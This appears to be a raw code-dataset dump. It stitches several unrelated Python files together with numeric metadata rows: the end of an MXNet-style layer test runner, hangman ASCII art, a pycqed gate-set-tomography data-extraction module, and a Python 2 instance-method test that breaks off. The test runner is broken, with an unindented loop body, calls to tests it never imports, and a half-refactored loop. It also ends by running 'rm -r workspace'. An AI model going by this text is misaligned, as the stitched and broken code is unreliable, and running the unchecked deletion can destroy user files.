from test_layer_transposed_convolution3d import test_layer_transposed_convolution3d
from test_layer_max_pooling1d import test_layer_max_pooling1d
from test_layer_max_pooling2d import test_layer_max_pooling2d
from test_layer_max_pooling3d import test_layer_max_pooling3d
from test_layer_average_pooling1d import test_layer_average_pooling1d
from test_layer_average_pooling2d import test_layer_average_pooling2d
from test_layer_average_pooling3d import test_layer_average_pooling3d
from test_layer_global_max_pooling1d import test_layer_global_max_pooling1d
from test_layer_global_max_pooling2d import test_layer_global_max_pooling2d
from test_layer_global_max_pooling3d import test_layer_global_max_pooling3d
from test_layer_global_average_pooling1d import test_layer_global_average_pooling1d
from test_layer_global_average_pooling2d import test_layer_global_average_pooling2d
from test_layer_global_average_pooling3d import test_layer_global_average_pooling3d
from test_layer_batch_normalization import test_layer_batch_normalization
from test_layer_instance_normalization import test_layer_instance_normalization
from test_layer_layer_normalization import test_layer_layer_normalization
from test_layer_identity import test_layer_identity
from test_layer_fully_connected import test_layer_fully_connected
from test_layer_dropout import test_layer_dropout
from test_layer_flatten import test_layer_flatten
from test_activation_relu import test_activation_relu
from test_activation_sigmoid import test_activation_sigmoid
from test_activation_tanh import test_activation_tanh
from test_activation_softplus import test_activation_softplus
from test_activation_softsign import test_activation_softsign
from test_activation_elu import test_activation_elu
from test_activation_gelu import test_activation_gelu
from test_activation_prelu import test_activation_prelu
from test_activation_leaky_relu import test_activation_leaky_relu
from test_activation_selu import test_activation_selu
from test_activation_swish import test_activation_swish
from test_layer_concatenate import test_layer_concatenate
from test_initializer_xavier_normal import test_initializer_xavier_normal
from test_initializer_xavier_uniform import test_initializer_xavier_uniform
from test_initializer_orthogonal_normal import test_initializer_orthogonal_normal
from test_initializer_orthogonal_uniform import test_initializer_orthogonal_uniform
from test_initializer_normal import test_initializer_normal
from test_initializer_uniform import test_initializer_uniform
from test_initializer_msra import test_initializer_msra
from test_block_resnet_v1 import test_block_resnet_v1
from test_block_resnet_v2 import test_block_resnet_v2
from test_block_resnet_v1_bottleneck import test_block_resnet_v1_bottleneck
from test_block_resnet_v2_bottleneck import test_block_resnet_v2_bottleneck
from test_block_resnext import test_block_resnext
from test_block_mobilenet_v2_linear_bottleneck import test_block_mobilenet_v2_linear_bottleneck
from test_block_mobilenet_v2_inverted_linear_bottleneck import test_block_mobilenet_v2_inverted_linear_bottleneck
from test_block_squeezenet_fire import test_block_squeezenet_fire
from test_block_densenet import test_block_densenet
from test_block_conv_bn_relu import test_block_conv_bn_relu
from test_block_inception_a import test_block_inception_a
from test_block_inception_b import test_block_inception_b
from test_block_inception_c import test_block_inception_c
from test_block_inception_d import test_block_inception_d
from test_block_inception_e import test_block_inception_e
# Keep a handle on the real stdout so per-test summary lines can reach the
# console while detailed test output is diverted into a log file.
origstdout = sys.stdout
print("Running Tests...")
sys.stdout = open("test_logs.txt", 'w')

try:
    print("System Check")
    from mxnet.runtime import feature_list
    print("Runtime elements - {}".format(feature_list()))
    print("")
except Exception:
    # Narrowed from a bare `except:` so SystemExit/KeyboardInterrupt are not
    # swallowed; only a genuine import/runtime failure lands here.
    print("Installation incomplete")
    # NOTE(review): exits with status 0 even though this is a failure path —
    # kept for backward compatibility, confirm no caller scripts on it.
    sys.exit(0)

# Shared accumulator threaded through every test function below.
system_dict = {
    "total_tests": 0,
    "successful_tests": 0,
    "failed_tests_lists": [],
    "failed_tests_exceptions": [],
    "skipped_tests_lists": [],
}

start = time.time()
exp_num = 1
# Every test follows the identical run-and-report protocol, so drive them
# from a single table instead of 50+ copy-pasted seven-line stanzas.  The
# list order reproduces the original execution sequence exactly.
_TEST_SEQUENCE = [
    test_layer_max_pooling1d,
    test_layer_max_pooling2d,
    test_layer_max_pooling3d,
    test_layer_average_pooling1d,
    test_layer_average_pooling2d,
    test_layer_average_pooling3d,
    test_layer_global_max_pooling1d,
    test_layer_global_max_pooling2d,
    test_layer_global_max_pooling3d,
    test_layer_global_average_pooling1d,
    test_layer_global_average_pooling2d,
    test_layer_global_average_pooling3d,
    test_optimizer_sgd,
    test_optimizer_nesterov_sgd,
    test_optimizer_rmsprop,
    test_optimizer_momentum_rmsprop,
    test_optimizer_adam,
    test_optimizer_adamax,
    test_optimizer_adadelta,
    test_optimizer_adagrad,
    test_optimizer_nadam,
    test_optimizer_signum,
    test_loss_l1,
    test_loss_l2,
    test_loss_softmax_crossentropy,
    test_loss_crossentropy,
    test_loss_sigmoid_binary_crossentropy,
    test_loss_binary_crossentropy,
    test_loss_kldiv,
    test_loss_poisson_nll,
    test_loss_huber,
    test_loss_hinge,
    test_loss_squared_hinge,
    test_layer_batch_normalization,
    test_layer_instance_normalization,
    test_layer_layer_normalization,
    test_layer_identity,
    test_layer_fully_connected,
    test_layer_dropout,
    test_layer_flatten,
    test_activation_relu,
    test_activation_sigmoid,
    test_activation_tanh,
    test_activation_softplus,
    test_activation_softsign,
    test_activation_elu,
    test_activation_gelu,
    test_activation_prelu,
    test_activation_leaky_relu,
    test_activation_selu,
    test_activation_swish,
    test_layer_concatenate,
]

for _test_fn in _TEST_SEQUENCE:
    # "Running N" goes to whatever sys.stdout currently is (the log file for
    # the very first test, the console afterwards) — same as the original.
    print("Running {}/<num>".format(exp_num))
    exp_num += 1
    system_dict = _test_fn(system_dict)
    # Restore the real stdout so the summary lines hit the console.
    sys.stdout = origstdout
    print("Tests Completed - {}".format(system_dict["total_tests"]))
    # "Succesful" typo preserved: it is runtime output other tooling may match.
    print("Tests Succesful - {}".format(system_dict["successful_tests"]))
    print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_xavier_normal(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_xavier_uniform(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_orthogonal_normal(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_orthogonal_uniform(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_normal(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_uniform(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_msra(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_resnet_v1(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_resnet_v2(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_resnet_v1_bottleneck(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_resnet_v2_bottleneck(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_resnext(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_mobilenet_v2_linear_bottleneck(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_mobilenet_v2_inverted_linear_bottleneck(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_squeezenet_fire(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_densenet(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_conv_bn_relu(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_inception_a(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_inception_b(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_inception_c(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_inception_d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_inception_e(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_convolution1d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_convolution2d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_convolution3d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_transposed_convolution1d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_transposed_convolution2d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_transposed_convolution3d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
sys.stdout = open("test_logs.txt", 'a');
end = time.time();
print("Total Tests - {}".format(system_dict["total_tests"]));
print("Time Taken - {} sec".format(end-start));
print("Num Successful Tests - {}".format(system_dict["successful_tests"]));
print("Num Failed Tests - {}".format(len(system_dict["failed_tests_lists"])));
print("Num Skipped Tests - {}".format(len(system_dict["skipped_tests_lists"])));
print("");
for i in range(len(system_dict["failed_tests_lists"])):
print("{}. Failed Test:".format(i+1));
print("Name - {}".format(system_dict["failed_tests_lists"][i]));
print("Error - {}".format(system_dict["failed_tests_exceptions"][i]));
print("");
print("Skipped Tests List - {}".format(system_dict["skipped_tests_lists"]));
print("");
sys.stdout = origstdout;
print("Total Tests - {}".format(system_dict["total_tests"]));
print("Time Taken - {} sec".format(end-start));
print("Num Successful Tests - {}".format(system_dict["successful_tests"]));
print("Num Failed Tests - {}".format(len(system_dict["failed_tests_lists"])));
print("Num Skipped Tests - {}".format(len(system_dict["skipped_tests_lists"])));
print("See test_logs.txt for errors");
print("");
os.system("rm -r workspace");
| 34.305946
| 113
| 0.71027
| 3,938
| 31,733
| 5.380904
| 0.035043
| 0.159509
| 0.126097
| 0.078339
| 0.824351
| 0.761538
| 0.756064
| 0.747664
| 0.747664
| 0.747664
| 0
| 0.00595
| 0.136672
| 31,733
| 925
| 114
| 34.305946
| 0.767521
| 0
| 0
| 0.723032
| 0
| 0
| 0.284112
| 0.00145
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.122449
| 0
| 0.122449
| 0.501458
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
4851a0cf280b3b2915d816d047a7996605d57022
| 1,748
|
py
|
Python
|
Projects/Hangman/hangman_art.py
|
UsmanAhmadSaeed/Python
|
a28f9ef28b6d7a1558b02b89d9da9cd5e964270e
|
[
"MIT"
] | 12
|
2021-01-18T16:22:27.000Z
|
2021-11-30T04:38:27.000Z
|
Projects/Hangman/hangman_art.py
|
UsmanAhmadSaeed/Python
|
a28f9ef28b6d7a1558b02b89d9da9cd5e964270e
|
[
"MIT"
] | 31
|
2021-03-02T16:33:16.000Z
|
2022-03-30T04:01:15.000Z
|
Projects/Hangman/hangman_art.py
|
UsmanAhmadSaeed/Python
|
a28f9ef28b6d7a1558b02b89d9da9cd5e964270e
|
[
"MIT"
] | 31
|
2021-03-02T14:26:17.000Z
|
2022-01-30T16:51:08.000Z
|
stages = ['''
+---+
| |
O |
/|\ |
/ \ |
|
=========
''', '''
+---+
| |
O |
/|\ |
/ |
|
=========
''', '''
+---+
| |
O |
/|\ |
|
|
=========
''', '''
+---+
| |
O |
/| |
|
|
=========''', '''
+---+
| |
O |
| |
|
|
=========
''', '''
+---+
| |
O |
|
|
|
=========
''', '''
+---+
| |
|
|
|
|
=========
''']
logo = '''
_
| |
| |__ __ _ _ __ __ _ _ __ ___ __ _ _ __
| '_ \ / _` | '_ \ / _` | '_ ` _ \ / _` | '_ \
| | | | (_| | | | | (_| | | | | | | (_| | | | |
|_| |_|\__,_|_| |_|\__, |_| |_| |_|\__,_|_| |_|
__/ |
|___/
'''
game_over = '''
._._. ________ ________ ._._.
| | |/ _____/_____ _____ ____ \_____ \___ __ ___________ | | |
| | / \ ___\__ \ / \_/ __ \ / | \ \/ // __ \_ __ \ | | |
\|\\\ \_\ \/ __ \| Y Y \ ___/ / | \ /\ ___/| | \/ \|\|
____\______ (____ /__|_| /\___ > \_______ /\_/ \___ >__| ____
\/\/ \/ \/ \/ \/ \/ \/ \/\/
'''
you_won = '''
._._._____.___. __ __ ._._.
| | |\__ | | ____ __ __ / \ / \____ ____ | | |
| | | / | |/ _ \| | \ \ \/\/ / _ \ / \ | | |
\|\| \____ ( <_> ) | / \ ( <_> ) | \ \|\|
____ / ______|\____/|____/ \__/\ / \____/|___| / ____
\/\/ \/ \/ \/ \/\/
'''
| 20.091954
| 74
| 0.161899
| 14
| 1,748
| 2.285714
| 0.571429
| 0.3125
| 0.375
| 0.375
| 0.1875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.553776
| 1,748
| 87
| 75
| 20.091954
| 0.041026
| 0
| 0
| 0.47561
| 0
| 0.073171
| 0.931961
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6f8c0cd1c2076363180a51bed7dae4bfb226be1c
| 9,785
|
py
|
Python
|
pycqed/analysis_v2/gate_set_tomography_analysis.py
|
nuttamas/PycQED_py3
|
1ee35c7428d36ed42ba4afb5d4bda98140b2283e
|
[
"MIT"
] | 60
|
2016-08-03T10:00:18.000Z
|
2021-11-10T11:46:16.000Z
|
pycqed/analysis_v2/gate_set_tomography_analysis.py
|
nuttamas/PycQED_py3
|
1ee35c7428d36ed42ba4afb5d4bda98140b2283e
|
[
"MIT"
] | 512
|
2016-08-03T17:10:02.000Z
|
2022-03-31T14:03:43.000Z
|
pycqed/analysis_v2/gate_set_tomography_analysis.py
|
nuttamas/PycQED_py3
|
1ee35c7428d36ed42ba4afb5d4bda98140b2283e
|
[
"MIT"
] | 34
|
2016-10-19T12:00:52.000Z
|
2022-03-19T04:43:26.000Z
|
import numpy as np
from collections import OrderedDict
from copy import deepcopy
import os
import pycqed.analysis_v2.base_analysis as ba
from pycqed.analysis import analysis_toolbox as a_tools
from pycqed.analysis import measurement_analysis as ma_old
import pygsti
from pycqed.measurement.gate_set_tomography.pygsti_helpers import \
gst_exp_filepath, pygsti_expList_from_dataset
class GST_SingleQubit_DataExtraction(ba.BaseDataAnalysis):
    """
    Extracts single-qubit GST measurement data: loads the raw shots and
    metadata, bins the shots per gatestring, and writes the counts out
    as a pygsti dataset text file.
    """

    def __init__(self, t_start: str = None, t_stop: str = None,
                 label: str = '', data_file_path: str = None,
                 options_dict: dict = None, extract_only: bool = False,
                 close_figs: bool = True,
                 do_fitting: bool = True, auto=True,
                 ch_idx: int = 0,
                 gst_exp_list_filepath: str = None):
        """
        Args:
            ch_idx: index into ``measured_values`` selecting the qubit's
                readout channel.
            gst_exp_list_filepath: explicit path to the pygsti experiment
                list file; if None it is resolved from the measurement's
                metadata in ``extract_data``.
            auto: if True, run the full analysis immediately.
            (remaining arguments are forwarded to BaseDataAnalysis)
        """
        super().__init__(t_start=t_start, t_stop=t_stop,
                         label=label,
                         data_file_path=data_file_path,
                         options_dict=options_dict,
                         close_figs=close_figs, extract_only=extract_only,
                         do_fitting=do_fitting)
        self.gst_exp_list_filepath = gst_exp_list_filepath
        self.ch_idx = ch_idx
        if auto:
            self.run_analysis()

    def extract_data(self):
        """Load raw sweep data, bins, and the experiment list path."""
        self.raw_data_dict = OrderedDict()
        self.timestamps = a_tools.get_timestamps_in_range(
            self.t_start, self.t_stop,
            label=self.labels)
        self.raw_data_dict['timestamps'] = self.timestamps
        # Only the first matching timestamp is analyzed.
        self.timestamp = self.timestamps[0]
        a = ma_old.MeasurementAnalysis(
            timestamp=self.timestamp, auto=False, close_file=False)
        a.get_naming_and_values()
        self.raw_data_dict['xvals'] = a.sweep_points
        self.raw_data_dict['xlabel'] = a.parameter_names[0]
        self.raw_data_dict['xunit'] = a.parameter_units[0]
        self.raw_data_dict['bins'] = a.data_file['Experimental Data'][
            'Experimental Metadata']['bins'].value
        # BUGFIX: compare to None with "is", not "==" (PEP 8).
        if self.gst_exp_list_filepath is None:
            # Fall back to the filename recorded in the measurement file.
            gst_exp_list_filename = a.data_file['Experimental Data'][
                'Experimental Metadata'].attrs['gst_exp_list_filename']
            self.raw_data_dict['gst_exp_list_filepath'] = os.path.join(
                gst_exp_filepath, gst_exp_list_filename)
        else:
            self.raw_data_dict['gst_exp_list_filepath'] = \
                self.gst_exp_list_filepath
        self.raw_data_dict['expList'] = pygsti_expList_from_dataset(
            self.raw_data_dict['gst_exp_list_filepath'])
        self.raw_data_dict['measured_values'] = a.measured_values
        self.raw_data_dict['value_names'] = a.value_names
        self.raw_data_dict['value_units'] = a.value_units
        self.raw_data_dict['measurementstring'] = a.measurementstring
        self.measurementstring = a.measurementstring
        self.raw_data_dict['folder'] = a.folder
        a.finish()

    def process_data(self):
        """
        Involves reshaping the data and writing it to a dataset textfile
        """
        self.proc_data_dict = deepcopy(self.raw_data_dict)
        bins = self.proc_data_dict['bins']
        self.proc_data_dict['binned_values'] = []
        self.proc_data_dict['binned_values_stderr'] = []
        expList = self.proc_data_dict['expList']
        # assumes shots are thresholded to 0/1 — TODO confirm upstream
        shots_1 = self.proc_data_dict['measured_values'][self.ch_idx]
        print("Nr bins:", len(bins))
        print("Nr gatestrings", len(expList))
        # Filter out uncompleted iterations (partial last sweep).
        missing_shots = (len(shots_1) % len(expList))
        if missing_shots != 0:
            shots_1 = shots_1[:-missing_shots]
        shots_0 = 1 - shots_1
        # order='F' groups shots of the same gatestring across sweeps.
        counts_1 = np.sum(shots_1.reshape(
            (len(expList), -1),
            order='F'), axis=1)
        counts_0 = np.sum(shots_0.reshape(
            (len(expList), -1),
            order='F'), axis=1)
        self.proc_data_dict['counts_0'] = counts_0
        self.proc_data_dict['counts_1'] = counts_1
        # writing to pygsti dataset
        ds = pygsti.objects.DataSet(outcomeLabels=['0', '1'])
        for i, gateString in enumerate(expList):
            ds.add_count_dict(gateString,
                              {'0': counts_0[i],
                               '1': counts_1[i]})
        ds.done_adding_data()
        ds_name = self.measurementstring + self.timestamp + '_counts.txt'
        dataset_fp = os.path.join(self.raw_data_dict['folder'], ds_name)
        pygsti.io.write_dataset(dataset_fp, ds)
        self.proc_data_dict['dataset'] = ds
        self.proc_data_dict['dataset_fp'] = dataset_fp
class GST_TwoQubit_DataExtraction(ba.BaseDataAnalysis):
    """
    Extracts two-qubit GST measurement data: loads the raw shots of two
    readout channels, forms the four two-qubit outcome counts per
    gatestring, and writes them out as a pygsti dataset text file.
    """

    def __init__(self, t_start: str = None, t_stop: str = None,
                 label: str = '', data_file_path: str = None,
                 options_dict: dict = None, extract_only: bool = False,
                 close_figs: bool = True,
                 do_fitting: bool = True, auto=True,
                 ch_idx0: int = 0,
                 ch_idx1: int = 1,
                 gst_exp_list_filepath: str = None):
        """
        Args:
            ch_idx0: channel index of qubit q0 (LSQ) in measured_values.
            ch_idx1: channel index of qubit q1 in measured_values.
            gst_exp_list_filepath: explicit path to the pygsti experiment
                list file; if None it is resolved from metadata.
            auto: if True, run the full analysis immediately.
            (remaining arguments are forwarded to BaseDataAnalysis)
        """
        super().__init__(t_start=t_start, t_stop=t_stop,
                         label=label,
                         data_file_path=data_file_path,
                         options_dict=options_dict,
                         close_figs=close_figs, extract_only=extract_only,
                         do_fitting=do_fitting)
        self.gst_exp_list_filepath = gst_exp_list_filepath
        self.ch_idx0 = ch_idx0
        self.ch_idx1 = ch_idx1
        if auto:
            self.run_analysis()

    def extract_data(self):
        """Load raw sweep data, bins, and the experiment list path."""
        self.raw_data_dict = OrderedDict()
        self.timestamps = a_tools.get_timestamps_in_range(
            self.t_start, self.t_stop,
            label=self.labels)
        self.raw_data_dict['timestamps'] = self.timestamps
        # Only the first matching timestamp is analyzed.
        self.timestamp = self.timestamps[0]
        a = ma_old.MeasurementAnalysis(
            timestamp=self.timestamp, auto=False, close_file=False)
        a.get_naming_and_values()
        self.raw_data_dict['xvals'] = a.sweep_points
        self.raw_data_dict['xlabel'] = a.parameter_names[0]
        self.raw_data_dict['xunit'] = a.parameter_units[0]
        self.raw_data_dict['bins'] = a.data_file['Experimental Data'][
            'Experimental Metadata']['bins'].value
        # BUGFIX: compare to None with "is", not "==" (PEP 8).
        if self.gst_exp_list_filepath is None:
            # Fall back to the filename recorded in the measurement file.
            gst_exp_list_filename = a.data_file['Experimental Data'][
                'Experimental Metadata'].attrs['gst_exp_list_filename']
            self.raw_data_dict['gst_exp_list_filepath'] = os.path.join(
                gst_exp_filepath, gst_exp_list_filename)
        else:
            self.raw_data_dict['gst_exp_list_filepath'] = \
                self.gst_exp_list_filepath
        self.raw_data_dict['expList'] = pygsti_expList_from_dataset(
            self.raw_data_dict['gst_exp_list_filepath'])
        self.raw_data_dict['measured_values'] = a.measured_values
        self.raw_data_dict['value_names'] = a.value_names
        self.raw_data_dict['value_units'] = a.value_units
        self.raw_data_dict['measurementstring'] = a.measurementstring
        self.measurementstring = a.measurementstring
        self.raw_data_dict['folder'] = a.folder
        a.finish()

    def process_data(self):
        """
        Involves reshaping the data and writing it to a dataset textfile
        """
        self.proc_data_dict = deepcopy(self.raw_data_dict)
        bins = self.proc_data_dict['bins']
        self.proc_data_dict['binned_values'] = []
        self.proc_data_dict['binned_values_stderr'] = []
        expList = self.proc_data_dict['expList']
        # assumes shots are thresholded to 0/1 — TODO confirm upstream
        shots_q0 = self.proc_data_dict['measured_values'][self.ch_idx0]
        shots_q1 = self.proc_data_dict['measured_values'][self.ch_idx1]
        print("Nr bins:", len(bins))
        print("Nr gatestrings", len(expList))
        # Filter out uncompleted iterations (partial last sweep).
        # BUGFIX: truncate each channel on its own remainder; previously
        # q1 was only truncated when q0 had a remainder, which would make
        # the reshape below fail for unequal channel lengths.
        extra_q0 = len(shots_q0) % len(expList)
        if extra_q0 != 0:
            shots_q0 = shots_q0[:-extra_q0]
        extra_q1 = len(shots_q1) % len(expList)
        if extra_q1 != 0:
            shots_q1 = shots_q1[:-extra_q1]
        # LSQ (q0) is last entry in list
        shots_00 = (1-shots_q1) * (1-shots_q0)
        shots_01 = (1-shots_q1) * (shots_q0)
        shots_10 = (shots_q1) * (1-shots_q0)
        shots_11 = (shots_q1) * (shots_q0)
        # order='F' groups shots of the same gatestring across sweeps.
        counts_00 = np.sum(np.reshape(shots_00, (len(expList),
                           len(shots_00)//len(expList)), order='F'), axis=1)
        counts_01 = np.sum(np.reshape(shots_01, (len(expList),
                           len(shots_01)//len(expList)), order='F'), axis=1)
        counts_10 = np.sum(np.reshape(shots_10, (len(expList),
                           len(shots_10)//len(expList)), order='F'), axis=1)
        counts_11 = np.sum(np.reshape(shots_11, (len(expList),
                           len(shots_11)//len(expList)), order='F'), axis=1)
        # writing to pygsti dataset
        outcomeLabels = [('00',), ('01',), ('10',), ('11',)]
        ds = pygsti.objects.DataSet(outcomeLabels=outcomeLabels)
        for i, gateString in enumerate(expList):
            ds.add_count_dict(gateString,
                              {'00': counts_00[i], '01': counts_01[i],
                               '10': counts_10[i], '11': counts_11[i]})
        ds.done_adding_data()
        ds_name = self.measurementstring + self.timestamp + '_counts.txt'
        dataset_fp = os.path.join(self.raw_data_dict['folder'], ds_name)
        pygsti.io.write_dataset(dataset_fp, ds)
        self.proc_data_dict['dataset'] = ds
        self.proc_data_dict['dataset_fp'] = dataset_fp
| 40.26749
| 108
| 0.608176
| 1,240
| 9,785
| 4.464516
| 0.126613
| 0.07659
| 0.067558
| 0.092124
| 0.84104
| 0.790101
| 0.779082
| 0.764451
| 0.734465
| 0.734465
| 0
| 0.01806
| 0.281349
| 9,785
| 242
| 109
| 40.433884
| 0.769198
| 0.036689
| 0
| 0.715084
| 0
| 0
| 0.086589
| 0.017981
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03352
| false
| 0
| 0.050279
| 0
| 0.094972
| 0.022346
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6f9ebffaaaf122bc0e80600bf3e9d0184e018e0e
| 896
|
py
|
Python
|
test/tests/instance_methods.py
|
lameiro/pyston
|
838e0ac98d5926ba942224951cd1e8bad5483b5e
|
[
"BSD-2-Clause",
"Apache-2.0"
] | null | null | null |
test/tests/instance_methods.py
|
lameiro/pyston
|
838e0ac98d5926ba942224951cd1e8bad5483b5e
|
[
"BSD-2-Clause",
"Apache-2.0"
] | null | null | null |
test/tests/instance_methods.py
|
lameiro/pyston
|
838e0ac98d5926ba942224951cd1e8bad5483b5e
|
[
"BSD-2-Clause",
"Apache-2.0"
] | null | null | null |
# Python 2 test script: prints the types and repr of unbound and bound
# methods, comparing the legacy im_func/im_self/im_class attributes with
# their __func__/__self__ aliases, for both new-style and old-style
# classes. (Uses py2 print statements; not valid Python 3.)
class C(object):
def foo(self):
pass
def __repr__(self):
return 'some C obj'
# Unbound method, accessed through the class.
print type(C.foo)
print type(C.foo.im_func), type(C.foo.__func__)
print type(C.foo.im_self), type(C.foo.__self__)
print type(C.foo.im_class)
print repr(C.foo)
# Bound method, accessed through an instance.
print type(C().foo)
print type(C().foo.im_func), type(C().foo.__func__)
print type(C().foo.im_self), type(C().foo.__self__)
print type(C().foo.im_class)
print repr(C().foo)
# old-style classes
class C:
def foo(self):
pass
